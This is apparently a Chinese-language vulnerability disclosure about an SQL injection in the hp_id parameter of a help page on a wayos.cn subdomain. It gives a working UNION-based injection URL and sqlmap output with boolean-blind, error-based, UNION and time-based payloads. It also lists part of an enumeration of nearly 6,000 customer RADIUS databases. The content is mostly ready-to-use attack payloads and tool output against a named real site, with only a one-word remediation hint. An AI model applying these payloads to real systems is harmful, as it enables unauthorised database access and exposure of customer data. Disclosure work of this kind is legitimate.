在子站下发现一枚注入
http://help.wayos.cn//detail.php?hp_id=51%20and%201=2%20union%20select%201,concat%28user%28%29,0x20,database%28%29,0x20,version%28%29%29,3,4,5,6,7,8,9,10,11
使用sqlmap跑了一下
sqlmap identified the following injection points with a total of 43 HTTP(s) requests: --- Place: GET Parameter: hp_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: hp_id=47 AND 9686=9686 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: hp_id=47 AND (SELECT 6038 FROM(SELECT COUNT(*),CONCAT(0x3a736b6a3a,(SELECT (CASE WHEN (6038=6038) THEN 1 ELSE 0 END)),0x3a7670693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: hp_id=47 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a736b6a3a,0x486c4143774e454a534c,0x3a7670693a), NULL, NULL, NULL, NULL, NULL, NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: hp_id=47 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: hp_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: hp_id=47 AND 9686=9686 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: hp_id=47 AND (SELECT 6038 FROM(SELECT COUNT(*),CONCAT(0x3a736b6a3a,(SELECT (CASE WHEN (6038=6038) THEN 1 ELSE 0 END)),0x3a7670693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: hp_id=47 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a736b6a3a,0x486c4143774e454a534c,0x3a7670693a), NULL, NULL, NULL, NULL, NULL, NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: hp_id=47 AND SLEEP(5) ---
然后发现了数据库里居然有差不多6000个database,我勒个去,这都是什么啊
数据库名:客户对wayos产品的命名+Radius
available databases [5984]: [*] a00jian_Radius [*] A023A_Radius [*] a03551_Radius [*] a10000_Radius [*] a100144_Radius [*] a10104091_Radius [*] a102699_Radius [*] a107258222_Radius [*] a109738668_Radius [*] a111111112_Radius [*] a11111111_Radius [*] a11111_Radius [*] a1111_Radius [*] a112013_Radius [*] a11788_Radius ............. ............. ............. [*] zzq520_Radius [*] zzqjsy_Radius [*] zzsj0371_Radius [*] zzvnet_Radius [*] zzxqcdc_Radius [*] zzy1981_Radius [*] zzy8202003_Radius [*] zzzfan007_Radius
过滤